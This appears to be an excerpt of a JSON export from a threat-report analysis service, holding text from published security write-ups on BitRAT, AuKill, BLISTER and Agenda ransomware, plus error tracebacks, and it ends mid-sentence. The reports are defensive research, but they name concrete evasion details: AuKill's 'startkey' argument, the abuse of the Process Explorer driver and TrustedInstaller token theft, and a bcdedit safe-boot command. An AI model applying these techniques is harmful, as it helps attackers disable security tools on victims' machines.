  "content": "Threat actors behind a recent malware campaign have been using the stolen\n\ninformation of bank customers in Colombia as lures in phishing emails\n\ndesigned to infect targets with the BitRAT remote access trojan, according to\n\ncloud security firm Qualys.\n\nThe company found that the infrastructure of an undisclosed Colombian\n\ncooperative bank had been hijacked by attackers while investigating BitRAT\n\nlures in active phishing attacks.\n\nA total of 418,777 records containing sensitive customer data, including\n\nnames, phone numbers, email addresses, addresses, Colombian national IDs,\n\npayment records, and salary information, were stolen from the breached\n\nservers.\n\nAPT36 state hackers infect Android devices\n\nusing YouTube app clones\n\nWhile investigating the campaign, Qualys also discovered evidence that the\n\nattackers had accessed customers' data, including logs showing that they\n\nlooked for SQL injection bugs using the sqlmap tool.\n\n\"Moreover, the lures themselves contain sensitive data from the bank to make\n\nthem appear legitimate. This means that the attacker has gotten access to\n\ncustomers data,\" Qualys said.\n\n\"While digging deeper into the infrastructure we identified logs that point to\n\nthe usage of the tool sqlmap to find potential SQLi faults, along with actual\n\ndatabase dumps.\"\n\nAt the moment, none of the information stolen from the Colombian bank's\n\nservers has been found on dark web or clearweb sites monitored by Qualys.\n\n\fThe malware is delivered to victims' computers via a malicious Excel file that\n\ndrops and executes an INF file encoded within a highly obfuscated macro\n\nbundled with the attachment.\n\nThe final BitRAT payload is then downloaded from a GitHub repository using\n\nthe WinHTTP library on the compromised device and executed with the help\n\nof the WinExec function.\n\nDuring the last stage of the attack, the RAT malware moves its loader to the\n\nWindows startup folder to gain persistence and automatically restart after\n\nsystem reboots.\n\nSince at least August 2020, BitRAT has been sold as off-the-shelf malware on\n\ndark web markets and cybercrime forums for as little as $20 for lifetime\n\naccess.\n\nAfter paying for a license, each \"customer\" uses their own approach to infect\n\nvictims with this malware, such as phishing, watering holes, and trojanized\n\nsoftware.\n\nThe highly versatile BitRAT can be used for a variety of malicious purposes,\n\nincluding recording video and audio, data theft, DDoS attacks, cryptocurrency\n\nmining, and delivering additional payloads.\n\n\"Commercial off the shelf. RATs have been evolving their methodology to\n\nspread and infect their victims,\" said Qualys threat research senior engineer\n\nAkshat Pradhan.\n\n\"They have also increased the usage of legitimate infrastructures to host their\n\npayloads and defenders need to account for it.\"\n\n\fA new BitRAT malware distribution campaign is underway, exploiting users\n\nlooking to activate pirated Windows OS versions for free using unofficial\n\nMicrosoft license activators.\n\nBitRAT is a powerful remote access trojan sold on cybercrime forums and dark\n\nweb markets for as low as $20 (lifetime access) to any cybercriminal who\n\nwants it.\n\nAs such, each buyer follows their own approach to malware distribution,\n\nranging from phishing, watering holes, or trojanized software.\n\nTargeting pirates with malware\n\nIn a new BitRAT malware distribution campaign discovered by researchers at\n\nAhnLab, threat actors are distributing the malware as a Windows 10 Pro\n\nlicense activator on webhards.\n\nWebhards are online storage services popular in South Korea that have a\n\nsteady influx of visitors from direct download links posted on social media\n\nplatforms or Discord. Due to their wide use in the region, threat actors are\n\nnow more commonly using webhards to distribute malware.\n\nThe actor behind the new BitRAT campaign appears to be Korean based on\n\nsome of the Korean characters in the code snippets and the manner of its\n\ndistribution.\n\nTo properly use Windows 10, you need to purchase and activate a license with\n\nMicrosoft. While there are ways to get Windows 10 for free, you still need a\n\nvalid Windows 7 license to get the free upgrade.\n\n\fThose who do not want to deal with licensing issues or do not have a license to\n\nupgrade commonly turn to pirating Windows 10 and using unofficial\n\nactivators, many of which contain malware.\n\nIn this campaign, the malicious file promoted as a Windows 10 activator is\n\nnamed 'W10DigitalActiviation.exe' and features a simple GUI with a button to\n\n\"Activate Windows 10.\"\n\nHowever, instead of activating the Windows license on the host system, the\n\n\"activator\" will download malware from a hardcoded command and control\n\nserver operated by the threat actors.\n\nThe fetched payload is BitRAT, installed in %TEMP% as\n\nSoftware_Reporter_Tool.exe and added to the Startup folder. The\n\ndownloader also adds exclusions for Windows Defender to ensure that BitRAT\n\nwont encounter detection issues.\n\nOnce the malware installation process is completed, the downloader deletes\n\nitself from the system leaving behind only BitRAT.\n\nA versatile RAT\n\nBitRAT is promoted as a powerful, inexpensive, and versatile malware that can\n\nsnatch a wide range of valuable information from the host, perform DDoS\n\nattacks, UAC bypass, etc.\n\nBitRAT supports generic keylogging, clipboard monitoring, webcam access,\n\naudio recording, credential theft from web browsers, and XMRig coin mining\n\nfunctionality.\n\n\fAdditionally, it offers remote control for Windows systems, hidden virtual\n\nnetwork computing (hVNC), and reverse proxy through SOCKS4 and SOCKS5\n\n(UDP). On that front, ASECs analysts have found strong code similarities with\n\nTinyNuke, and its derivative, AveMaria (Warzone).\n\nThe hidden desktop feature on these RATs is so valuable that some hacking\n\ngroups, like the Kimsuky, incorporated them in their arsenal just to use the\n\nhVNC tool.\n\nRisk of piracy\n\nEven if the legal and ethical aspects are ignored, using pirated software is\n\nalways a security gamble.\n\nThe more tools are used to activate illegally obtained copies of software or\n\ncrack their intellectual property protection systems, the greater the chances of\n\nending up with a nasty malware infection.\n\nThose who cant afford to purchase a Windows license should look at\n\nalternative options instead, such as accepting the limitations of the free\n\nversion, monitoring for special offers from trustworthy platforms, or using\n\nLinux.\n\nUltimately, users should not trust license activators and any unsigned\n\nexecutable authored and released by unknown vendors to run on your system.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-02T19:37:03.382Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b1c6c4870a8160e460e31"
  },
  "name": "Aukill",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Aukill.pdf",
  "file_size": "66 KB",
  "content": "Over the past several months, Sophos X-Ops has investigated multiple\nincidents where attackers attempted to disable EDR clients with a new\ndefense evasion tool weve dubbed AuKill. The AuKill tool abuses an outdated\nversion of the driver used by version 16.32 of the Microsoft utility, Process\nExplorer, to disable EDR processes before deploying either a backdoor or\nransomware on the target system.\n\nThe tool was used during at least three ransomware incidents since the\nbeginning of 2023 to sabotage the targets protection and deploy the\nransomware: In January and February, attackers deployed Medusa Locker\nransomware after using the tool; in February, an attacker used AuKill just prior\nto deploying Lockbit ransomware.\n\nThis is not the rst time we and other vendors reported on multiple threat\ngroups simultaneously deploying software designed to kill EDR agents that\nprotect computers. In December 2022, Sophos, Microsoft, Mandiant, and\nSentinelOne reported that a number of attackers had used custom-built\ndrivers to disable EDR products.\n\nIn contrast, the AuKill tool abused a legitimate, but out-of-date and exploitable,\ndriver. This technique is commonly referred to as a bring your own vulnerable\ndriver (BYOVD) attack.\n\nThe method of abusing the Process Explorer driver to bypass EDR systems\nisnt new; it was implemented in the open-source tool Backstab, rst published\nin June 2021. In fact, Sophos and other security vendors have previously\nreported on multiple incidents where either Backstab, or a version of this\ndriver, was used for malicious purposes.\n\nLast November, for example, Sophos X-Ops reported that a threat actor\nworking for the LockBit ransomware group used Backstab to disable EDR\nprocesses on an infected machine. Three months later, Sentinel One\npublished a report about a tool they called MalVirt, which uses the same\nProcess Explorer driver to disable security products before deploying the nal\npayload on the target machine.\n\n\fThrough analysis and threat hunting, Sophos has collected six different\nvariants of the AuKill malware. We have found multiple similarities between\nthe open-source tool Backstab and AuKill. Some of these similarities include\nsimilar, characteristic debug strings, and nearly identical code ow logic to\ninteract with the driver.\n\nAuKill entries (highlighted) in the list of Windows Services\n\nSophos believes the author of AuKill used multiple code snippets from, and\nbuilt their malware around, the core technique introduced by Backstab.\n\nLegitimate Driver Abuse and Procexp.sys\n\nThreat actors increasingly have been relying on abusable drivers to disable\nsecurity tools. Drivers are low-level system components that can access\ncritical security structures in kernel memory. As a security mechanism,\nWindows by default employs a feature called Driver Signature Enforcement\nthat ensures kernel-mode drivers have been signed by a valid code signing\nauthority before Windows will permit them to run. This signature serves as a\nsign of trust to verify the identity of the software and to protect a users\nsystem.\n\nTo get around this security measure, adversaries need to either contrive a way\nto get a malicious driver signed by a trusted certicate (like we discussed in\nour December research), or (as is more common) abuse a legitimate\ncommercial software driver to reach their goal, in a BYOVD attack.\n\nIn this case, the attackers took advantage of a driver both created by and\nsigned by Microsoft. The Process Explorer driver, part of their suite of\nadministration tools produced by the Sysinternals team, implements a variety\nof features to interact with running processes.\n\nAuKill drops a driver named PROCEXP.SYS (from the release version 16.32 of\nprocess Explorer) into the C:\\Windows\\System32\\drivers path. The legitimate\n\n\fProcess Explorer driver is named PROCEXP152.sys, and normally is found in\nthe same location. Both drivers can be present on a machine that has a copy\nof Process Explorer running. The AuKill installer also drops an executable\ncopy of itself to either the System32 or the TEMP directory, which it runs as a\nservice.\n\nThe maliciously installed Process Explorer driver, highlighted in red, in the Drivers folder\nalongside the legitimate Process Explorer driver, proxexp152.sys\n\nFor example, the driver can receive the IO control code\nIOCTL_CLOSE_HANDLE from user-mode applications, which commands the\ndriver to close a protected process handle, resulting in terminating a process.\n\nAbusing this process requires the attacker to use administrative privileges on\nthe system. Normally, when an attacker obtains administrative privileges, it\nmeans that they have full control over the machine.\n\nHowever, critical processes on Windows, such as endpoint clients, are under\nadditional protection features to prevent attackers from disabling them once\nthey escalate privileges. An example of an additional protection feature is the\nProtected Antimalware Services concept introduced in Windows 8.1.\n\nTo circumvent such features, attackers need to go one level deeper  to run a\ndriver in kernel-mode. In this case, AuKill abuses the legitimate driver behind\nProcess Explorer to overcome these features.\n\nThe AuKill tool requires administrative privileges to work, but it cannot give the\nattacker those privileges. The threat actors using AuKill took advantage of\nexisting privileges during the attacks, when they gained them through other\nmeans.\n\nTechnical analysis of AuKills evolution\n\n\fOver the last three months, we collected six different versions and tracked the\nfunctionality changes from version to version. For simplicity, we dubbed the\noldest version of the malware as AuKill V1, the most recent version as AuKill\nV6.\n\nNotably, the compiler and targeted security components changed. Figure 1\ndisplays a timeline of the following events:\n\n  The compilation time stamp of the AuKill version. The rst event for\nexample displays that the binary AuKill V1 contains a compilation\ntimestamp of the date 2022-11-13.\n\n  The date of when a corresponding sample was scanned the rst time in\nour internal systems. On 2022-11-17 for example, the rst time AuKill V1\nappeared in our internal systems.\n\n  For correlation, we also added the timestamps when we were able to\nlink this malware to specic ransomware attacks. On 2023-01-18, we\nwere unable to obtain the AuKill sample used in the incident. However,\non the 2023-02-14, we linked AuKill V1 to another incident, where the\nthreat actors tried to deploy Medusa Locker.\n\nWhile the compilation time stamp of a PE le can indeed be faked, if we\nreconstruct the time delta between the moment the le was compiled and the\ntime it initially appeared in our systems, it seems likely the compilation time\nstamps are the actual ones.\n\n\fCompilation timestamps, hashes, and targets of each version we analyzed\n\nOur analysis focuses primarily on the samples labeled AuKill V1 and AuKill V6.\nV1 was seen in most incidents, however AuKill V6 seems to be an\nexperimental version that introduces interesting changes. In the upcoming\nsections we refer to V6 as the debug (or experimental) version. (Full\nindicators-of-compromise for this malware are posted to the SophosLabs\nGithub.)\n\n\fA comparison between these two versions gives interesting insights into the\npossible direction of future updates.\n\nPhase 1: Installing The Service\n\nWhen executed, the malware rst checks if it has administrator privileges. It\nalso requires that the attacker runs the le with a keyword (or password) as\nthe rst argument on the command line. The execution aborts if either of\nthese requirements are not fullled. (The attacker needs to acquire\nadministrative rights before they can run the tool.)\n\nFor both samples covered in this analysis section (and all six samples listed in\nthe IOCs), attackers need to pass the string startkey as the rst command line\nargument.\n\nThe malware validates the password/keyword using a simple arithmetic sum\ncalculation. It iterates a process where it derives the decimal value of the\nASCII code for each character, doubles the value, then adds it to the next\ncharacters decimal value, which is then doubled, and so on.\n\nAfter the calculation is nished, the sum result is returned and compared\nagainst a hardcoded expected value, in this case 57502 (represented as the\nhexadecimal value 0xE09E). The python implementation of the algorithm is\ndisplayed below.\n\nIf the sample does not run with SYSTEM privileges, it continues by attempting\nto elevate its rights by impersonating the security context of\nTrustedInstaller.exe.\n\nFirst, AuKill starts the Trusted Installer service. Then it duplicates the token of\nTrustedInstaller.exe using the DuplicateTokenW WINAPI function, and passes\n\n\fthe token to CreateProcessWithTokenW to elevate itself to SYSTEM once the\nprocess restarts.\n\nFinally, it copies itself to C:\\Windows\\system32, installs itself as a service,\nand starts the service.\n\nPhase 2: Disabling Security\n\nOnce the malware establishes persistence by creating the service entry, it\ndrops procexp.sys onto disk. The driver is embedded in AuKill as a resource.\nBoth versions covered in this analysis drop procexp.sys into\nC:\\Windows\\System32\\drivers. The gure below shows decompiled code of\nV1, where the malware reads procexp.sys from resources and writes it to disk.\n\nNotably, the debug version also tries to connect to a driver named\nWindowsKernelExplorer.sys as a fallback, in case it fails to drop and load\nprocexp.sys. However, the fallback driver is not embedded in the resources\nlike procexp.sys. It expects that this driver, part of, already exists in the\nSystem32\\drivers folder.\n\nAt this point we cant conrm that the driver in the linked repository is the one\nbeing abused here.\n\nAuKill prevents services from restarting\n\nAn EDR client usually consists of multiple components that work in\nconjunction. A component could be (for example) an installed service or\nrunning process, each with its own functionality. Therefore, if one crashes or\nterminates, it usually restarts as soon as possible.\n\n\fTo prevent these components from restarting, AuKill starts several threads to\nensure that these EDR processes and services stay disabled. Each thread\ntargets a different component and continuously probes if the targeted\nprocesses or services are running. If any of them are, AuKill disables or\nterminates it. The initialization of these threads can be seen in gure 6.\n\nThe targeted vendors and services vary from sample to sample. Below gure\n6, we also share an analysis of the different functions used to disable EDR\ncomponents we found through reverse engineering.\n\n1  Terminate Via Procexp\n\nThe rst type of function takes a list of process names as input and is called\nTerminateViaProcexp in the image above.\n\nIt iterates through all running processes. If a process name is included in the\nlist, AuKill sends IO control code IOCTL_CLOSE_HANDLE to procexp.sys to\nclose the process handle. This results in terminating the targeted process.\n\nAuKill V6 starts two threads running this function. The rst thread targets a\nlist of Microsoft related security processes and the second one a list of\nvarious vendors. Most process names are related to security vendors.\nHowever, the creator also included a list of names for remote access tools in\nthe target list.\n\n2  Terminate Forcefully\n\nThe second type of function takes a list of vendors related process names as\nan argument and runs in a separate thread again. The malware iterates\nthrough all running processes and if a process name is included in this list,\nAuKill attempts to forcefully terminate it via TerminateProcess.\n\nThis thread was removed in the debug version but is included in other versions\nsuch as the version V2 of AuKill.\n\n\f3  Disable Services\n\nThe third function type is called DisableServices in the image above, and takes\na hardcoded list of service names as input.\n\nFor each service name in the list, AuKill checks if it exists, and if it does,\ndisables it by calling ChangeServiceCongW and passing SERVICE_DISABLED\nfor dwStartType.\n\nAgain, in AuKill V6 we see two threads being instanced running this function.\n\n4  Unload Drivers\n\nThe nal function type is called Unload Driver in gure 6 and takes a list of\nhardcoded driver names as an input.\n\nFor each driver name, AuKill tries to unload it via calling NtUnloadDriver and\ndeleting the corresponding registry key in the hive\nSystem\\CurrentControlSet\\Services\\[DRIVER_NAME].\n\nWeve only observed this function in AuKill V6.\n\nDriver Abuse Continues To Rise In\n\n2023\n\nDisabling EDR clients using drivers, whether they are legitimate and abused\nfor malicious purposes (BYOVD), or signed by a stolen/leaked certicate,\ncontinues to be popular among adversaries who want to disable defense\nmechanisms.\n\nLast year, the security community reported about multiple incidents, where\ndrivers have been weaponized for malicious purposes. The discovery of such\n\n\fa tool conrms our assumption that adversaries continue to weaponize\ndrivers, and we expect even more development in this area the upcoming\nmonths.\n\nDetection guidance\n\nCurrently, Sophos detects AuKill variants as ATK/BackStab-D. Additionally, we\nprotect customers with behavioral detections (such as the Priv_5a behavioral\nrule) against the attack scenario explained in this article. These protections do\nnot inhibit users from running legitimate copies of Process Explorer, nor do\nSophos products detect or remove the legitimate Process Explorer driver\nwhen it is used normally.\n\nSophos has notied Microsoft about this abuse of the deprecated Process\nExplorer driver.\n\nFinally, businesses and people can take additional steps to defend computers\nthey own against driver abuse:\n\nIt is highly suggested to check if your endpoint security product\nimplements and enables tamper protection. This feature provides a\nstrong layer against such type of attacks. If you use Sophos products\nbut dont currently have Sophos tamper protection enabled, turn it on\ntoday.\n\n  Practice strong Windows security roles hygiene. This attack is only\n\npossible if the attacker escalates privileges they control, or can obtain\nadministrator rights. Separation between user and admin privileges can\nhelp prevent attackers from easily loading drivers.\n\n  Keep your system updated. As we discussed in our December research,\nWindows maintains a list of drivers for which Microsoft has revoked\ncerticates, or deprecated drivers that have been historically abused,\nand updates that list through the Windows Update mechanism.\n\n \n\fIn addition to your operating system, its also important to check,\nperiodically, whether there are updates for applications and other tools\non your computer, and to remove older tools if they are no longer\nrequired or used.\nLegitimate driver abuse can also happen if a vulnerable driver already\nexists on the system. Having a strong vulnerability management\nprogram can aid in closing such protection gaps.\n\n \n \n\f",
  "status": "FAILED TO ANALYZE",
  "report_type": "FILE",
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 106, in __convert_openAI_analysis\n    ThreatReportCCFESerializer().load(analysis)\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 722, in load\n    return self._do_load(\n           ^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 909, in _do_load\n    raise exc\nmarshmallow.exceptions.ValidationError: {'threat_actor': ['Shorter than minimum length 1.']}\n",
  "added_on": {
    "$date": "2023-10-02T19:39:24.825Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b1caa4870a8160e460e32"
  },
  "name": "Blister",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Blister.pdf",
  "file_size": "104 KB",
  "status": "FAILED TO ANALYZE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-10-02T19:40:26.000Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_on": {
    "$date": "2023-10-02T19:51:16.001Z"
  },
  "gcloud_request": null,
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 106, in __convert_openAI_analysis\n    ThreatReportCCFESerializer().load(analysis)\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 722, in load\n    return self._do_load(\n           ^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 909, in _do_load\n    raise exc\nmarshmallow.exceptions.ValidationError: {'threat_actor': ['Shorter than minimum length 1.']}\n",
  "content": "In a fast-paced and ever-changing world of cybercrime threats, the tenacity and\nadaptability of malicious actors is a signicant concern. BLISTER, a malware loader\ninitially discovered by Elastic Security Labs in 2021 and associated with\nnancially-motivated intrusions, is a testament to this trend as it continues to develop\nadditional capabilities. Two years after its initial discovery, BLISTER continues to receive\nupdates while ying under the radar, gaining momentum as an emerging threat. Recent\nndings from Palo Altos Unit 42 describe an updated SOCGHOLISH infection chain\nused to distribute BLISTER and deploy a payload from MYTHIC, an open-source\nCommand and Control (C2) framework.\n\nKey takeaways\n\n Elastic Security Labs has been monitoring malware loader BLISTER ramping up\nwith new changes, and ongoing development with signs of imminent threat\nactivity\n\n New BLISTER update includes keying feature that allows for precise targeting of\n\nvictim networks and lowers exposure within VM/sandbox environments\n\n BLISTER now integrates techniques to remove any process instrumentation hook\nand has modied its conguration with multiple revisions, now encompassing\nadditional elds and ags.\n\nOverview\n\nOur research uncovered new functionality that was previously absent within the\nBLISTER family, indicating ongoing development. However, the malware authors\ncontinue to use a distinctive technique of embedding malicious code in otherwise\nlegitimate applications. This approach supercially appears successful, given the low\nrates of detection for many vendors as seen in VirusTotal. The signicant amount of\nbenign code and use of encryption to protect the malicious code are likely two factors\nimpacting detection.\n\nRecently, Elastic Security Labs has observed many new BLISTER loaders in the wild.\nAfter analyzing various samples, its clear that the malware authors have made some\nchanges and have been watching the antivirus industry closely. In one sample from\n\n\fearly June, we can infer that the authors were testing with a non-production loader that\ndisplays a Message Box displaying the strings Test.\n\nReaders can see a disassembled view of this functionality below.\n\nBy the end of July, we observed campaigns involving a new BLISTER loader that\ntargeted victim organizations to deploy the MYTHIC implant.\n\nAt the time of this writing, Elastic Security Labs is seeing a stream of BLISTER samples\nwhich deploy MYTHIC and have very low rates of detection.\n\nComparative analyses\n\nSmuggling malicious code\n\nThe authors behind BLISTER employ a consistent strategy of embedding BLISTER's\nmalicious code within a legitimate library. The most recent variants of this loader have\ntargeted the VLC Media Player library to smuggle their malware into victim\nenvironments. This blend of benign and malicious code seems effective at defeating\nsome kinds of machine-learning models.\n\nThe following is a comparison between a legitimate VLC DLL and one that is infected\nwith BLISTERs code. In the infected sample, the entry point that references malicious\ncode has been indicated in red. This methodology is similar to prior BLISTER variants.\n\nDifferent hashing algorithm\n\n\fOne of the changes implemented since our last write-up is the adoption of a different\nhashing algorithm used in the core and in the loader part of BLISTER. While the previous\nversion used simple logic to shift bytes, this new version includes a hard-coded seed\nwith XOR and multiplication operations. Researchers speculate that changing the\nhashing approach helps to evade antimalware products that rely on YARA signatures.\n\nConfiguration retrieval\n\nFollowing the decryption of malicious code by the BLISTERd loader, it employs an\nidentical memory scanning method to identify the conguration data blob. This is\naccomplished by searching for a predetermined, hardcoded memory pattern. A notable\ncontrast from the earlier iteration of BLISTER lies in the fact that the conguration is\nnow decrypted in conjunction with the core code, rather than being treated as a\nseparate entity.\n\nEnvironmental keying\n\nA recent addition to BLISTER is the capability to exclusively execute on designated\nmachines. This behavior is activated by conguring the appropriate ag within the\nmalwares conguration. Subsequently, the malware proceeds to extract the machine's\ndomain name using the GetComputerNameExW Windows API. Following this, the domain\nname is hashed using the previously mentioned algorithm, and the resulting hash is\nthen compared to a hash present in the conguration. This functionality is presumably\ndeployed for the purpose of targeted attacks or for testing scenarios, ensuring that the\nmalware refrains from infecting unintended systems such as those employed by\nmalware researchers.\n\nOne of the few malware analysis tools capable of quickly exposing this behavior is the\nawesome Tiny Tracer utility by hasherezade. Weve included an excerpt from\nTiny_Tracer below which captures the BLISTER process immediately terminating after\nthe GetComputerNameExW validation is performed in a sandboxed analysis VM.\n\nTime-based anti-debugging feature\n\n\fSimilar to its predecessors, the malware incorporates a time-based anti-debugging\nfunctionality. However, unlike the previous versions in which the timer was hardcoded,\nthe updated version introduces a new eld in the conguration. This eld enables the\ncustomization of the sleep timer, with a default value of 10 minutes. This default interval\nremains unchanged from prior iterations of BLISTER.\n\nUnhook process instrumentation to detect syscalls\n\nIn this latest version, BLISTER introduces noteworthy functionality: it unhooks any\nongoing process instrumentation, a tactic designed to circumvent userland syscall\ndetection mechanisms upon which certain EDR solutions are based.\n\nBLISTER's configuration\n\nThe BLISTER conguration structure has also been changed with the latest variants.\nTwo new elds have been added and the ag eld at offset 0 has been changed from a\nWORD to a DWORD value. The new elds pertain to the hash of the domain for\nenvironmental keying and the congurable sleep time; these eld values are at offset 4\nand 12 respectively. The following is the updated structure of the conguration:\n\nChanges have also been made to the conguration ags, allowing the operator to\nactivate different functions within the malware. Researchers have provided an updated\nlist of functions built upon our prior research into BLISTER.\n\nPayload extractor update\n\nIn our previous research publication, we introduced an ecient payload extractor\ntailored to dissect and extract the conguration and payload of the loader. To dissect\nthe most recent BLISTER variants and capture these new details, we enhanced our\nextractor which is available here.\n\n\fConclusion\n\nBLISTER is one small part of the global cybercriminal ecosystem, providing\nnancially-motivated threats to gain access to victim environments and avoid detection\nby security sensors. The community should consider these new developments and\nassess the ecacy of BLISTER detections, Elastic Security Labs will continue to monitor\nthis threat and share actionable guidance.\n\nSecurity researchers have uncovered a malicious campaign that relies on a\n\nvalid code-signing certificate to disguise malicious code as legitimate\n\nexecutables.\n\nOne of the payloads that the researchers called Blister, acts as a loader for\n\nother malware and appears to be a novel threat that enjoys a low detection\n\nrate.\n\nThe threat actor behind Blister has been relying on multiple techniques to\n\nkeep their attacks under the radar, the use of code-signing certificates being\n\nonly one of their tricks.\n\nThousands of Juniper devices vulnerable to\n\nunauthenticated RCE flaw\n\nSigned, sealed, delivered\n\n\fWhoever is behind Blister malware has been running campaigns for at least\n\nthree months, since at least September 15, security researchers from Elastic\n\nsearch company found.\n\nThe threat actor used a code-signing certificate that is valid from August 23,\n\nthough. It was issued by digital identity provider Sectigo for a company called\n\nBlist LLC with an email address from a Russian provider Mail.Ru.\n\nsource: Elastic\n\nUsing valid certificates to sign malware is an old trick that threat actors\n\nlearned years ago. Back then, they used to steal certificates from legitimate\n\ncompanies. These days, threat actors request a valid cert using details of a firm\n\nthey compromised or of a front business.\n\nIn a blog post this week, Elastic says that they responsibly reported the abused\n\ncertificate to Sectigo so it could be revoked.\n\nThe researchers say that the threat actor relied on multiple techniques to keep\n\nthe attack undetected. One method was to embed Blister malware into a\n\nlegitimate library (e.g. colorui.dll).\n\nThe malware is then executed with elevated privileges via the rundll32\n\ncommand. Being signed with a valid certificate and deployed with\n\nadministrator privileges makes Blister slip past security solutions.\n\nIn the next step, Blister decodes from the resource section bootstrapping code\n\nthat is heavily obfuscated, Elastic researchers say. For ten minutes, the code\n\nstays dormant, likely in an attempt to evade sandbox analysis.\n\nIt then kicks into action by decrypting embedded payloads that provide\n\nremote access and allow lateral movement: Cobalt Strike and BitRAT - both\n\nhave been used by multiple threat actors in the past.\n\n\fThe malware achieves persistence with a copy in the ProgramData folder and\n\nanother posing as rundll32.exe. It is also added to the startup location, so it\n\nlaunches at every boot, as a child of explorer.exe.\n\nElastics researchers found signed and unsigned versions of the Blister loader,\n\nand both enjoyed a low detection rate with antivirus engines on VirusTotal\n\nscanning service.\n\ndetection rate of unsigned Blister malware sample\n\nWhile the objective of these attacks of the initial infection vector remain\n\nunclear, by combining valid code-signing certs, malware embedded in\n\nlegitimate libraries, and execution of payloads in memory the threat actors\n\nincreased their chances for a successful attack.\n\nElastic has created a Yara rule to identify Blister activity and provides\n\nindicators of compromise to help organizations defend against the threat.\n\nUpdate [01/07/2022]: Sectigo's Chief Compliance Officer Tim Callan\n\nprovided the following comment for BleepingComputer regarding the Blister\n\nmalware campaign using a signed certificate:\n\n\"During the week of December 21, 2021, Sectigo was made aware of a\n\ncode-signing certificate being used by the threat actor behind the recently\n\ndiscovered BLISTER malware. Upon discovering the issue, Sectigo\n\nimmediately revoked the compromised certificate.\n\nAs one of the longest-standing publicly trusted Certificate Authorities, Sectigo\n\ntakes careful precautions to ensure that every certificate we issue follows the\n\nguidelines set by the CA/Browser forum. Sectigo does not regulate, control, or\n\nmonitor the business practices of any operator, nor do our services relate in\n\nany way whatsoever with the content distributed by a particular operator.\"\n\n\f\f"
},
{
  "_id": {
    "$oid": "65244944fec8c00d802df9a4"
  },
  "name": "Agenda Ransomware (qilin group)",
  "file_type": null,
  "website_url": "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html",
  "website_title": "New Golang Ransomware Agenda Customizes Attacks",
  "file_name": null,
  "file_size": null,
  "content": "Business\nsearch\nRansomware\nNew Golang Ransomware Agenda Customizes Attacks\nA new piece of ransomware written in the Go language has been targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.\nBy: Mohamed Fahmy, Nathaniel Gregory Ragasa, Earle Maui Earnshaw, Bahaa Yamany, Jeffrey Francis Bonaobra, Jay Yaneza\nAugust 25, 2022\nRead time: 7 min (1930 words)\nSubscribe\nWe recently discovered a new piece of targeted ransomware that was created in the Go programming language and that explicitly targeted one of our customers. This was evidenced by the specific email addresses and credentials the ransomware used. Malware written in the Go language (aka Golang) has become common among threat actors. One possible reason for this uptick in popularity is that Go statically compiles necessary libraries, making security analysis much harder.\nOur investigation revealed that the new ransomware in question targeted enterprises in Asia and Africa. Based on dark web posts by a user named “Qilin” (who seems to be connected to the ransomware distributors) and through ransom notes, the ransomware is called “Agenda.” \nAgenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run. The samples of the ransomware that we collected were customized for each victim, and they included unique company IDs and leaked account details.\nTargets\nAll collected samples were 64-bit Windows PE (Portable Executable) files written in Go, and they were aimed at Windows-based systems. The group distributing the malware was targeting healthcare and education organizations in Indonesia, Saudi Arabia, South Africa, and Thailand. Every ransomware sample was customized for the intended victim. Our investigation showed that the samples had leaked accounts, customer passwords, and unique company IDs used as extensions of encrypted files.\nWe believe that Qilin (or the Agenda ransomware group) offers affiliates options to customize configurable binary payloads for each victim, including details such as company ID, RSA key, and processes and services to kill before the data encryption. Also, the ransom amount requested is different per company, ranging from US$50,000 to US$800,000.\nFigure 1. An example of Qilin’s ransom negotiations\nFigure 2. An example of ransom amount requested by Qilin\nSimilarities with other ransomware\nWe noticed some similarities between Agenda and the Black Basta, Black Matter, and REvil (aka Sodinokibi) ransomware.\nIn terms of payment sites and the implementation of user verification on a Tor site,  Agenda is very similar to Black Basta and Black Matter. Meanwhile, Agenda shares with Black Basta and REvil the same functionality of changing Windows passwords and rebooting in safe mode using this command:\nC:\\windows\\system32\\bcdedit.exe  /set safeboot{current} network\nObserved kill chain\nInvestigating one incident involving this ransomware, we saw that the threat actor behind it used a public-facing Citrix server as a point of entry. We believe that the threat actor used a valid account to access this server and later move inside the victim’s network. This was expected since the actor configured the ransomware with valid and privileged accounts.\nThe threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine. \nFigure 3. The scheduled task pushed by the group policy\nFigure 4. The scheduled task created on the machine\nWe observed that there was only a short period between accessing the Citrix server and the ransomware infection: less than two days. The threat actor seemed to have scanned the network on the first day, and then a Group Policy Object (GPO) was created and the ransomware was deployed on the machines.\nFigure 5. The Agenda ransomware’s kill chain\nAnalysis and notable features\nThe Agenda ransomware is a 64-bit Windows PE file written in Go. Go programs are cross-platform and completely standalone, meaning they will execute properly even without a Go interpreter installed on a system. This is possible since Go statically compiles necessary libraries (packages).\nUpon execution, this ransomware accepts various command-line arguments that define the malware flow and 